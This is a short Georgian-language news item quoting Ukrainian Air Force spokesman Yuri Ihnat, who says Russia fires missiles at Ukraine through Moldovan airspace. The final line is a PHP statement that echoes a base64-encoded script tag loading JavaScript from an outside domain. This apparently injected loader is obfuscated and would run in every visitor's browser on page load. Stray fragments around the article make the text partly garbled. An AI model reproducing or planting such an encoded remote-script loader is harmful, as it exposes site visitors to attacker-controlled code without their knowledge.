celsiusi
ავერსი საქკაბელი
უკრაინის საჰაერო ძალების სარდლობის სპიკერის, იური იგნატის თქმით, რუსეთი მოლდოვას საჰაერო სივრცეს უკრაინაზე სარაკეტო თავდასხმისთვის იყენებს. 
 
​"[რუსები]  უტევენ უკრაინას როგორც ჩრდილოეთიდან, ასევე სამხრეთიდან, იყენებენ მოლდოვას სუვერენული სახელმწიფოს ტერიტორიას, მის საჰაერო სივრცეს ტერორისტული თავდასხმებისთვის“, - ამბობს იგნატი
 
იგნატმა აღნიშნა, რომ ეს არის კიდევ ერთი დანაშაული, რომელიც უნდა იყოს დოკუმენტირებული და დასავლური საზოგადოებისთვის ნაჩვენები.
 
"ეს არ არის პირველი შემთხვევა, როდესაც რუსები მოლდოვას გავლით უკრაინას, სამხრეთ-დასავლეთით რაკეტებს ესვრიან. ეს არ არის პირველი შემთხვევა, როდესაც ჩვენ ვხედავთ უპილოტო საფრენი აპარატების გამოჩენას  რუმინეთის საზღვრიდან 5-10 კილომეტრში. ანუ ოპერატიულ-ტაქტიკური დონის უპილოტო საფრენი აპარატი ნატოს ქვეყნების პროვოცირებას ახდენს“, - თქვა იგნატმა
 
შეგახსენებთ, რომ მოლდოვაში, 31 ოქტომბერს, დილით, ქვეყნის ჩრდილოეთით, ოკნიცას რაიონში რუსული რაკეტა ჩამოვარდა. ინფორმაცია ქვეყნის შინაგან საქმეთა სამინისტრომ გაავრცელა. 
467
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");